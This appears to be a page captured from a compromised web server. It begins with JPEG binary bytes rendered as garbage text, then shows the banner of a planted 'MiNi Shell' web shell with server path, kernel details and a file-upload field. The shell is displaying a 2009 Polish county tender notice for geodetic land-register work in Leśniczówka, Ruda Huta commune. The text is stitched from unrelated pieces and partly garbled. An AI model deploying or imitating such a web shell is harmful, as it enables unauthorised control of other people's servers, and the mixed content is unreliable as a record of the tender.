JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090313/49751-N-2009.html

<p class="kh_header"><b>Chełm: Założenie numerycznej mapy zasadniczej, wykonanie modernizacji ewidencji gruntów i założenie ewidencji budynków i lokali poprzez założenie w systemie informatycznym ewidencji gruntów, budynków i lokali dla obrębu  Leśniczówka, gmina Ruda Huta, powiat chełmski, woj. lubelskie.</b><br>
<b>Numer ogłoszenia: 49751 - 2009; data zamieszczenia: 13.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Chełmski , Plac Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. 082 5627501, faks 082 5627510.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.chelm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Założenie numerycznej mapy zasadniczej, wykonanie modernizacji ewidencji gruntów i założenie ewidencji budynków i lokali poprzez założenie w systemie informatycznym ewidencji gruntów, budynków i lokali dla obrębu  Leśniczówka, gmina Ruda Huta, powiat chełmski, woj. lubelskie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usług geodezyjnych w zakresie:
Założenie numerycznej mapy zasadniczej, wykonanie modernizacji ewidencji gruntów i założenie ewidencji budynków i lokali poprzez założenie w systemie informatycznym ewidencji gruntów, budynków i lokali dla obrębu  Leśniczówka, gmina Ruda Huta, powiat chełmski, woj. lubelskie.
Ogólna charakterystyka obiektu:
Nr obrębu- 0010,

Identyfikator- 060309_2.0010

Szacowana ilość wszystkich:
 Działek- 582,
budynków i lokali-   245 (+/ -10%), 
Powierzchnia obrębu [ha]- 497 .

	Zadanie polega na modernizacji ewidencji gruntów i założeniu ewidencji  budynków i lokali dla obrębu ewidencyjnego, Leśniczówka, gmina Ruda Huta, powiat chełmski na bazie numerycznej mapy zasadniczej w celu dostosowania do zgodności z przepisami rozporządzenia Ministra Rozwoju Regionalnego i Budownictwa z dnia 29 marca 2001 r. w sprawie ewidencji gruntów i budynków
( Dz. U. Nr 38  poz.454 ) oraz Instrukcji technicznej G-5 - Ewidencja gruntów i budynków.

Prace muszą  być wykonane zgodnie z projektem modernizacji ewidencji gruntów 
i budynków dla obrębu Leśniczówka, gmina Ruda Huta uzgodnionym z Wojewódzkim Inspektorem Nadzoru Geodezyjnego i Kartograficznego w Lublinie w dniu 16.02.2009 roku pismem GN.I.JW.7621/25/09 oraz zgodnie z Warunkami Technicznymi stanowiącymi załącznik nr  6 do Specyfikacji Istotnych Warunków Zamówienia.

Prace na obiekcie Leśniczówka, gmina Ruda Huta przebiegać będą w trzech etapach:

ETAP I:
1) analiza materiałów geodezyjnych i kartograficznych otrzymanych z PODGiK i innych źródeł pod  kątem możliwości i sposobu  ich  wykorzystania do wykonania przedmiotu zamówienia ( w tym badanie ksiąg wieczystych i zbiorów dokumentów),
2) przegląd istniejącej na opracowywanym obszarze szczegółowej osnowy poziomej II i III klasy i istniejącej osnowy pomiarowej
3) założenie trwale stabilizowanej osnowy pomiarowej.
4) uzgodnienia branżowe, w tym: Wojewódzki Konserwator Zabytków, Wojewódzki Zarząd Melioracji i Urządzeń Wodnych oraz inne uzgodnienia dotyczące uzbrojenia terenu,
5) opracowanie mapy zasadniczej w postaci numerycznej zgodnie z instrukcją techn. K-1 (z wyjątkiem granic działek i użytków gruntowych, na podstawie): 
- istniejących opracowań geodezyjno - kartograficznych 
- pomiarów uzupełniających
 -pomiarów sytuacyjno - wysokościowych
- bezpośredniego pomiaru wszystkich budynków
6) pozyskanie danych źródłowych do założenia ewidencji budynków i lokali.

ETAP II:
1) numeryczne opracowanie granic klasoużytków na podstawie mapy klasyfikacyjnej, 
2) numeryczne opracowanie granic prawnych  działek dla których istnieje dokumentacja pozwalająca na ich jednoznaczne określenie w układzie 1965,
3) wznowienie lub ustalenie i pomiar położenia punktów granicznych działek,
4) numeryczne opracowanie granic użytków gruntowych,
5) opracowanie numerycznej mapy zasadniczej o pełnej treści zgodnie z instrukcją K-1 w programie GEO-MAP, edycja w skali 1 :1000,
6) opracowanie mapy ewidencji gruntów i budynków w kroju obrębowym w programie GEO-MAP, edycja w skali 1 : 5000,
7) sporządzenie dokumentacji do aktualizacji operatu ewidencji gruntów i założenia ewidencji budynków oraz dokumentacji do aktualizacji ksiąg wieczystych.

ETAP III:
1) wyłożenie projektu operatu opisowo-kartograficznego,
2) aktualizacja zbiorów danych opisowych ewidencji gruntów i budynków w systemie EGBV-Win.

Z każdego etapu przekazana zostanie do Zamawiającego dokumentacja wynikowa (szczegółowo określona w Warunkach Technicznych stanowiących załącznik nr 6 do SIWZ), która poddana zostanie kontroli przez komisję powołaną przez Starostę Chełmskiego do odbioru zleconych  prac.
Okres gwarancji na przedmiot zamówienia nie krótszy niż 3 lata..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca  przystępujący do przetargu  jest zobowiązany wnieść wadium w wysokości 4 000,00 zł / cztery tysiące złotych /.
2. Wykonawca wnosi wadium  w formie określonej w art. 45 ustawy.
3. Wadium wniesione w pieniądzu należy  wpłacić na rachunek bankowy Starostwa Powiatowego w  Chełmie PKO B.P. SA  o/ Chełm 25 1020 1563 0000 5902 0013 7349 z dopiskiem wadium przetarg - Leśniczówka . Wadium uważa się za wniesione, jeżeli kwota wadium znajdzie się na rachunku zamawiającego  przed upływem terminu składania ofert.
4. Dowód  wniesienia wadium należy dołączyć do  oferty.
5. Nie wniesienie wadium lub wniesienie wadium po terminie spowoduje wykluczenie wykonawcy  z postępowania.
6. Zamawiający dokona zwrotu wadium zgodnie z treścią  art.46 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1, oraz nie podlegają wykluczeniu na podstawie art. 24 ust.1, 2, ustawy Prawo zamówień publicznych.
1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.: 
a) w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonali co najmniej jedno zamówienie odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 80 000 zł (netto) z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, z załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie,  
b) dysponują lub będą dysponować co najmniej 2 osobami posiadającymi uprawnienia zawodowe, określone w art. 43 pkt 1 i 2 ustawy z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne - Dz.U. Z 2005 r. Nr 240, poz. 2027 z póź. zm., z załączeniem dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają uprawnienia,  
3.  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4. Nie podlegają wykluczeniu z postępowania o zamówienie publiczne. 
5. Dopuszcza się możliwość złożenia oferty wspólnej przez dwóch lub więcej wykonawców w   rozumieniu art. 23 ustawy. W przypadku złożenia oferty wspólnej każdy z wykonawców musi  oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1 i 4 ustawy. 
    Wymagania określone w art. 22 ust. 1 pkt 2 i 3 ustawy Wykonawcy mogą spełniać wspólnie. 
    Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

     Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń wymienionych w punkcie VI SIWZ, zgodnie z formułą   spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, spełnienia warunków określonych w rozdz. V wykonawca zobowiązany jest złożyć wraz z ofertą niżej wymienione oświadczenia i dokumenty:
1.Oświadczenie, że:
a) posiada uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiada niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia. 
c) znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) nie podlegają wykluczeniu z postępowania o zamówienie publiczne. 
Oświadczenie to należy złożyć według wzoru stanowiącego załącznik nr 2 do SIWZ.

2.  W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  z dnia  29 stycznia 2004 r. Prawo  Zamówień Publicznych, Wykonawca powinien złożyć  następujące dokumenty:
    a)   aktualny odpis z właściwego rejestru albo aktualne  zaświadczenia o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub  zgłoszenia do ewidencji działalności gospodarczej,  wystawionego nie wcześniej niż sześć miesięcy  przed  upływem terminu składania ofert.

3. W celu potwierdzenia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,  wykonawca winien złożyć następujące dokumenty:
a) wykaz wykonanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, obejmujących co najmniej jedno zamówienie odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia o wartości nie mniejszej niż 80 000 zł (netto), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców  z załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie, według wzoru stanowiącego  załącznik nr 3 do SIWZ, 

 b) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonanych przez nie czynności, pisemne zobowiązanie innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował, w tym co najmniej 2 osoby posiadające uprawnienia zawodowe, określone w art. 43 pkt 1 i 2 ustawy z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne - t. j. Dz.U. z 2005 r. Nr 240, poz. 2027 z póź. zm. - według wzoru stanowiącego załącznik nr 4 do SIWZ, 

c) stwierdzające, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,  
 Dokumenty  należy złożyć  w  formie oryginału lub  kopii  poświadczonej za zgodność z oryginałem  (na każdej zapisanej stronie) przez Wykonawcę lub upoważnionego przedstawiciela Wykonawcy, zgodnie z treścią dokumentu określającego status prawny Wykonawcy lub treścią załączonego do oferty pełnomocnictwa..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiat.chelm.pl/przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Chełmie, Plac Niepodległości 1, 22-100 Chełm, p 108, I piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2009 godzina 12:00, miejsce: Sekretariat Starostwa Powiatowego w Chełmie, Plac Niepodległości 1, 22-100 Chełm, p.114, I piętro lub za pośrednictwem pocztowego operatora publicznego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com